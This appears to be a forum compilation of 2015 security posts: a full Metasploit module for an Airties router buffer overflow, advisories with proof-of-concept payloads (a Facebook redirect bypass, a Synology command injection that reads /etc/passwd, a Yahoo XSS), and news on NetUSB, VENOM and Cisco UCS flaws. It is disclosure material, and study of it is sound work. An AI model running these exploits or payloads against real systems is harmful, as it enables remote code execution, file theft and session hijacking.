  15. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Airties login-cgi Buffer Overflow', 'Description' => %q{ This module exploits a remote buffer overflow vulnerability on several Airties routers. The vulnerability exists in the handling of HTTP queries to the login cgi with long redirect parameters. The vulnerability doesn't require authentication. This module has been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation. Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable. }, 'Author' => [ 'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'Arch' => ARCH_MIPSBE, 'References' => [ ['EDB', '36577'], ['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC ], 'Targets' => [ [ 'AirTies_Air5650v3TT_FW_1.0.2.0', { 'Offset' => 359, 'LibcBase' => 0x2aad1000, 'RestoreReg' => 0x0003FE20, # restore s-registers 'System' => 0x0003edff, # address of system-1 'CalcSystem' => 0x000111EC, # calculate the correct address of system 'CallSystem' => 0x00041C10, # call our system 'PrepareSystem' => 0x000215b8 # prepare $a0 for our system call } ] ], 'DisclosureDate' => 'Mar 31 2015', 'DefaultTarget' => 0)) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check begin res = send_request_cgi({ 'uri' => '/cgi-bin/login', 'method' => 'GET' }) if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 100 ) end def prepare_shellcode(cmd) shellcode = rand_text_alpha_upper(target['Offset']) # padding shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N") # restore registers with controlled values # 0003FE20 lw $ra, 0x48+var_4($sp) # 0003FE24 lw $s7, 0x48+var_8($sp) # 0003FE28 lw $s6, 0x48+var_C($sp) # 0003FE2C lw $s5, 0x48+var_10($sp) # 0003FE30 lw $s4, 0x48+var_14($sp) # 0003FE34 lw $s3, 0x48+var_18($sp) # 0003FE38 lw $s2, 0x48+var_1C($sp) # 0003FE3C lw $s1, 0x48+var_20($sp) # 0003FE40 lw $s0, 0x48+var_24($sp) # 0003FE44 jr $ra # 0003FE48 addiu $sp, 0x48 shellcode << rand_text_alpha_upper(36) # padding shellcode << [target['LibcBase'] + target['System']].pack('N') # s0 - system address-1 shellcode << rand_text_alpha_upper(16) # unused registers $s1 - $s4 shellcode << [target['LibcBase'] + target['CallSystem']].pack('N') # $s5 - call system # 00041C10 move $t9, $s0 # 00041C14 jalr $t9 # 00041C18 nop shellcode << rand_text_alpha_upper(8) # unused registers $s6 - $s7 shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N') # write sp to $a0 -> parameter for call to system # 000215B8 addiu $a0, $sp, 0x20 # 000215BC lw $ra, 0x1C($sp) # 000215C0 jr $ra # 000215C4 addiu $sp, 0x20 shellcode << rand_text_alpha_upper(28) # padding shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N') # add 1 to s0 (calculate system address) # 000111EC move $t9, $s5 # 000111F0 jalr $t9 # 000111F4 addiu $s0, 1 shellcode << cmd end def execute_command(cmd, opts) shellcode = prepare_shellcode(cmd) begin res = send_request_cgi({ 'method' => 'POST', 'uri' => '/cgi-bin/login', 'encode_params' => false, 'vars_post' => { 'redirect' => shellcode, 'user' => rand_text_alpha(5), 'password' => rand_text_alpha(8) } }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
  16. Document Title: =============== Facebook #26 - Filter Bypass & Exception Handling Redirect Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1483 http://www.vulnerability-lab.com/get_content.php?id=1484 Video View: https://www.youtube.com/watch?v=I65zFWF-pMg Release Date: ============= 2015-05-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1483 Common Vulnerability Scoring System: ==================================== 5.1 Product & Service Introduction: =============================== Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website`s membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site. Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as `People From Work` or `Close Friends`. As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site`s terms of service. In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade `best-of` list, saying, `How on earth did we stalk our exes, remember our co-workers` birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?` Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the first time, being placed at position of 462 on the list published in 2013. (Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a filter bypass and open redirect web vulnerability in the official Facebook online-service framework. Vulnerability Disclosure Timeline: ================================== 2015-05-01: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2015-05-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Facebook Product: Framework - Content Management System 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A filter validation issue is existant in the exception-handling that normally redirects to the original facebook source. Ever if an error comes up the website will show the context in the secure exception and redirects on okey click to the original valid source. In case of terminating the string (%00%00_%3F) with extended <_ it is possible to bypass the exception-handling filter exception to redirect invalid source to an external target. The video demonstrates how to bypass the filter validation by confusing the context copying with the non encoded url that invalid. By generating a payload that is ahead in the display value and atleast in the url ref the target exception redirect can be manipulated. Proof of Concept (PoC): ======================= https://www.facebook.com/dialog/send?app_id=102628213125203&display=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_popup&link=http%3A%2F%2Fwww.ebay.com%2Fcln%2F%00%2F%00%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3Froken%3DcUgayN&description=%00%40eBayF%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_&redirect_uri=http%3A%2F%2F%EF%BF%BD/%EF%BF%BD%EF%BF%BD%3C%uFFFD/%uFFFD%uFFFD%3C_popup%2Fsoc%2Fshareclose&__mref=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble https://www.facebook.com/dialog/send?app_id=102628213125203&display=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_popup&link=http%3A%2F%2Fwww.ebay.com%2Fcln%2F%00%2F%00%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3Froken%3DcUgayN&description=%00%40eBayF%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_&redirect_uri=http%3A%2F%2F%EF%BF%BD/%EF%BF%BD%EF%BF%BD%3C%uFFFD/%uFFFD%uFFFD%3C_popup%2Fsoc%2Fshareclose&__mref=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble Payload: 3A%2F%2F%EF%BF%BD/%EF%BF%BD%EF%BF%BD%3C%uFFFD/%uFFFD%uFFFD%3C_ F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble<_ PoC Video(s): The video demonstrates how to evade the filter validation of the message context that is delivered by a url link. The researcher demonstrates how to bypass the basic encoding by preparing a valid exception with unauthorized redirect. Security Risk: ============== The security risk of the filter bypass and exception redirect web vulnerability is estimated as medium. (CVSS 5.1) The same payload to evade the filter validation can be used to other sections and exceptions that redirect the ref with the same conditions. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  17. ------------------------------------------------------------------------ Command injection vulnerability in Synology Photo Station ------------------------------------------------------------------------ Han Sahin, May 2015 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver. An attacker can use this vulnerability to compromise a Synology DiskStation NAS, including all data stored on the NAS. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was tested on Synology Photo Station version 6.2-2858. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Synology reports that this issue has been resolved in Photo Station version 6.3-2945. https://www.synology.com/en-us/releaseNote/PhotoStation ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.html Proof of concept The following proof of concept copies the /etc/passwd file to /var/services/photo/Securify.txt. <html> <body> <form action="http://<target>/photo/webapi/photo.php" method="POST"> <input type="hidden" name="id" value="photo_536168696e_53637265656e2053686f7420323031352d30352d31302061742032322e33342e33352e706e67" /> <input type="hidden" name="description" value="| cat /etc/passwd > /var/services/photo/Securify.txt " /> <input type="hidden" name="api" value="SYNO.PhotoStation.Photo" /> <input type="hidden" name="method" value="edit" /> <input type="hidden" name="version" value="1" /> <input type="hidden" name="ps_username" value="admin" /> <input type="hidden" name="" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> Sursa: http://dl.packetstormsecurity.net/1505-exploits/synologyphotostation-exec.txt
  18. Document Title: =============== iClassSchedule 1.6 iOS & Android - Persistent UI Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1494 Release Date: ============= 2015-05-13 Vulnerability Laboratory ID (VL-ID): ==================================== 1494 Common Vulnerability Scoring System: ==================================== 3.4 Product & Service Introduction: =============================== Couldn`t you remember your lesson time? If you are a high-school student or a university one, you will be able easily to consult your weekly guide, using this App on your iPhone. You could choose your sujects following your plan and give them a colour for marking them at the end of the week. (Copy of the Homepage: https://play.google.com/store/apps/details?id=com.idalmedia.android.timetable&hl=it & https://itunes.apple.com/en/app/orariolezioni/id542313616) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official iClassSchedule v1.6 iOS & Android mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-13: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Tel.Net srl Product: iClassSchedule - iOS & Android Mobile Web Application 1.6 iOS and 4.6 Android Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An application-side validation vulnerability has been discovered in the official iClassSchedule v1.6 iOS & Android mobile web-application. The vulnerability allows an attacker to inject own script code as payload to the application-side of the vulnerable service function or module. The vulnerability is located in the `Aula (name input)` values of the vulnerable `iClass Calender` module. Local attackers are able to manipulate the `Aula name` input to compromise the `Calender Index` module. The execution point of the script code occurs on the application-side in the listing module by the manipulated name context field. The Apple iOS and Google Android mobile application versions are affected by the vulnerability. The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4. Exploitation of the application-side web vulnerability requires a privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context. Vulnerable Module(s): [+] Aula Vulnerable Parameter(s): [+] name Affected Module(s): [+] iClass Calender Events Context (App Index) Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by local attackers with physical device access and with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. 1. Install the mobile application to your iOS or Android device 2. Open the application and add a new entry to the iclass calender index 3. Inject to the Aula name value your own script code (payload) for testings 4. Save the entry and move back to the iclass calender index of the app 5. The code executes because of the wrong encoding in the calender itself. Note: Export and Exchange of malicious context is possible! 6. Successful reproduce of the security vulnerability! Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable name value in the iclass calender module. Restrict the name input and disallow usage of special chars to prevent persistent cross site scripting attacks. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the name value is estimated as medium. (CVSS 3.4) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  19. Millions of routers and other embedded devices are affected by a serious vulnerability that could allow hackers to compromise them. The vulnerability is located in a service called NetUSB, which lets devices connected over USB to a computer be shared with other machines on a local network or the Internet via IP (Internet Protocol). The shared devices can be printers, webcams, thumb drives, external hard disks and more. NetUSB is implemented in Linux-based embedded systems, such as routers, as a kernel driver. The driver is developed by Taiwan-based KCodes Technology. Once enabled, it opens a server that listens on TCP port 20005 for connecting clients. Security researchers from a company called Sec Consult found that if a connecting computer has a name longer than 64 characters, a stack buffer overflow is triggered in the NetUSB service. If exploited, this kind of vulnerability can result in remote code execution or denial of service. Since the NetUSB service code runs in kernel mode, attackers who exploit the flaw could gain the ability to execute malicious code on the affected devices with the highest possible privilege, the Sec Consult researchers said in a blog post Tuesday. Many vendors integrate NetUSB into their products, but have different names for it. For example, Netgear calls the feature ReadySHARE, while others simply call it print sharing or USB share port. Sec Consult has confirmed the vulnerability in the TP-Link TL-WDR4300 V1, TP-Link WR1043ND v2 and Netgear WNDR4500 routers. However, after scanning firmware images from different manufacturers for the presence of the NetUSB.ko driver, they believe that 92 other products from D-Link, Netgear, TP-Link, Trendnet and ZyXEL Communications are likely vulnerable. The researchers also found references to 26 vendors in the NetUSB.inf client driver for Windows, so they believe many other vendors might also have vulnerable products. They’ve alerted the CERT Coordination Center (CERT/CC), the German CERT-Bund and Austrian CERT, who are working to notify the vendors. On some devices it’s possible for users to disable the feature from the Web-based administration interface or to block access to the port using the firewall feature. However, on some devices, like those made by Netgear, this is not possible, the researchers said. Many devices likely expose the NetUSB service to the local area network only, but there might be implementations that expose it to the Internet as well. Even when restricted to the local network only, the vulnerability still poses a high risk, because attackers can potentially exploit it if they compromise any computer from the local network or if they gain access to the network in some other way—for example, due to weak or no wireless password. As far as the Sec Consult researchers know, only TP-Link has released fixes so far. It has a release schedule for around 40 products. TP-Link, Netgear, D-Link and ZyXEL did not immediately respond to a request for comment. This vulnerability is just the latest in a long stream of basic security flaws found in consumer routers in recent years. “It is safe to say that vulnerability reports like these will continue to appear until a paradigm shift is enacted at the manufacturer level,” said Jacob Holcomb, a security analyst at Baltimore-based Independent Security Evaluators, via email. Holcomb has found many vulnerabilities in routers and other embedded devices over the past several years. Security Evaluators organized a router hacking contest at the DefCon security conference last year. The way in which vendors have implemented NetUSB in their products is egregious, Holcomb said. “For instance, hardcoded AES keys, the processing of unvalidated and untrusted data, and kernel integration are all red flags that should have been identified during the early stages of SDLC [software development lifecycle].” Source
  20. There's an extremely critical bug in the Xen, KVM, and native QEMU virtual machine platforms and appliances that makes it possible for attackers to break out of protected guest environments and take full control of the operating system hosting them, security researchers warned Wednesday. The vulnerability is serious because it pierces a key protection that many cloud service providers use to segregate one customer's data from another's. If attackers with access to one virtualized environment can escape to the underlying operating system, they could potentially access all other virtual environments. In the process, they would be undermining one of the fundamental guarantees of virtual machines. Compounding the severity, the vulnerability resides in a low-level disk controller, allowing it to be exploited when guest or host OSes alike run Linux, Windows, Mac OS X, or possibly other OSes. Researchers from security firm CrowdStrike, who first warned of the vulnerability, wrote: The vulnerability is the result of a buffer-overflow bug in QEMU's virtual Floppy Disk Controller, which is used in a variety of virtualization platforms and appliances. It is known to affect Xen, KVM, and the native QEMU client software, and it may affect others. VMware, Microsoft Hyper-V, and Bochs hypervisors are not affected. At publication time, patches were available from the Xen Project and the QEMU Project. RedHat has a patch here. There are also workarounds users can follow to lessen the risk of exploitation. The vulnerability is serious enough that users of other virtualization packages should immediately contact the developers to find out if they're susceptible. The bug has existed since 2004. There's no indication that the vulnerability is being actively exploited maliciously in the wild. Although the vulnerability is agnostic of the OS running both the guest and host, attack code exploiting the bug must have administrative or root privileges to the guest. The threat is greatest for people who rely on virtual private servers, which allow service providers to host multiple operating systems on a single physical server. Because virtual servers are often provided to different customers, it's common that they have administrative or root privileges to that guest OS that could be used to take over the underlying machine. CrowdStrike's advisory went on to state: For those who are unable to patch vulnerable software, CrowdStrike offered the following: The vulnerability has been dubbed Venom, short for virtualized environment neglected operations manipulation. Some people are already comparing its severity to Heartbleed, the catastrophic bug disclosed in April 2014 that exposed private cryptography keys, end-user passwords, and other sensitive data belonging to countless services that used the OpenSSL crypto library. At this early stage, it's too early to know if the comparison to Heartbleed is exaggerated, since at the moment there's no indication that Venom is being actively exploited. Tod Beardsley, a research manager at vulnerability assessment provider Rapid7, has indicated that the threat from Venom is likely not as serious. In an e-mailed statement, he wrote: Those limitations aside, there's an extremely broad range of platforms that are vulnerable to this exploit, and those platforms house servers used by banks, e-commerce providers, and countless other sensitive services. Given the large number of servers that are vulnerable and the extremely high value of the assets they contain, this security bug should be considered a top priority. Source
  21. Document Title: =============== Yahoo eMarketing Bug Bounty #31 - Cross Site Scripting Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1491 Yahoo Security ID (H1): #55395 Release Date: ============= 2015-05-07 Vulnerability Laboratory ID (VL-ID): ==================================== 1491 Common Vulnerability Scoring System: ==================================== 3.3 Product & Service Introduction: =============================== Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail, Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a billion consumers every month in more than 30 languages. (Copy of the Vendor Homepage: http://www.yahoo.com ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a client-side cross site scripting web vulnerability in the official Yahoo eMarketing online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-03: Vendor Notification (Yahoo Security Team - Bug Bounty Program) 2015-05-05: Vendor Response/Feedback (Yahoo Security Team - Bug Bounty Program) 2015-05-06: Vendor Fix/Patch (Yahoo Developer Team) 2015-05-06: Bug Bounty Reward (Yahoo Security Team - Bug Bounty Program) 2015-05-07: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A non-persistent input validation web vulnerability has been discovered in the official Yahoo eMarketing online service web-application. The security vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise user/admin session information. The vulnerability is located in the `id` value of the `eMarketing` module. Remote attackers are able to inject malicious script codes to client-side GET method application requests. Remote attackers are able to prepare special crafted web-links to execute client-side script code that compromises the yahoo user/admin session data. The execution of the script code occurs in same module context location by a mouse-over. The attack vector of the vulnerability is located on the client-side of the online service and the request method to inject or execute the code is GET. The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the non-persistent cross site scripting web vulnerability requires no privileged web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of malicious script codes or non-persistent web module context manipulation. Request Method(s): [+] GET Vulnerable Module(s): [+] Yahoo > eMarketing Vulnerable Parameter(s): [+] id Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without privilege application user account and low user interaction (click). For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC Payload(s): "onmouseenter="confirm(document.domain) (https://marketing.tw.campaign.yahoo.net/) PoC: eMarketing ID <br/> <table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td align="right" width="10%" > <div class="fb-like" style="overflow: hidden; " data-href="http://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id="onmouseenter="confirm(document.domain)" data-layout="button_count" data-action="recommend" data-show-faces="false" data-share="true"></div> </td> <td align="left" valign="bottom" width="65%" > <span style="font-size:12px; margin: 2px; font-weight:bold; color:#4d0079">?????????? ????????</span> </td> </tr> </table> --- PoC Session Logs [GET] --- Status: 200[OK] GET https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id=%22onmouseenter=%22confirm(document.domain) Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html] Request Headers: Host[marketing.tw.campaign.yahoo.net] User-Agent[Mozilla/5.0 (X11; Linux i686; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] Cookie[_ga=GA1.5.1632823259.1428499428; s_pers=%20s_fid%3D66FF8BBF1D4DB480-10779CBEBDA57A64%7C1491837590956%3B%20s_vs%3D1%7C1428680990957%3B%20s_nr%3D1428679190961-New%7C1460215190961%3B; __qca=P0-870655898-1430085821750; _ga=GA1.2.1969841862.1430892005] X-Forwarded-For[8.8.8.8] Connection[keep-alive] Response Headers: Date[Wed, 06 May 2015 12:19:05 GMT] Server[ATS] X-Powered-By[PHP/5.3.27] Content-Type[text/html] Age[0] Connection[close] Via[http/1.1 leonpc (ApacheTrafficServer/4.2.0 [c sSf ])] Reference(s): https://marketing.tw.campaign.yahoo.net https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/ https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id= Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable id value in the emarketing service application of yahoo. Restrict the input and disallow special chars or script code tags to prevent further injection attacks. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the tw yahoo application is estimated as medium. (CVSS 3.3) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  22. Cisco has patched a remote code execution bug that could give attackers root privileges on its Unified Computing System (UCS) Central software used by more than 30,00 organisations. The UCS data centre server platform joins hardware, virtualisation, networking and software into one system. Versions 1.2 and below are affected. The Borg says the vulnerability (CVE-2015-0701) rates the maximum 10 severity rating due to its low exploitation requirements and "complete" impact to confidentiality, integrity and availability. "A vulnerability in the web framework of Cisco UCS Central Software could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device," it says in an advisory. "The vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the root user." The Borg says patches for the bug are available but warns there are no workarounds. <pSuccessful exploitation of the problem would grant unauthenticated access to sensitive information, allow arbitrary command execution on UCS boxes' operating systems, or create denial of service conditions. Happily, no attacks using the flaw have been spotted in the wild. Source
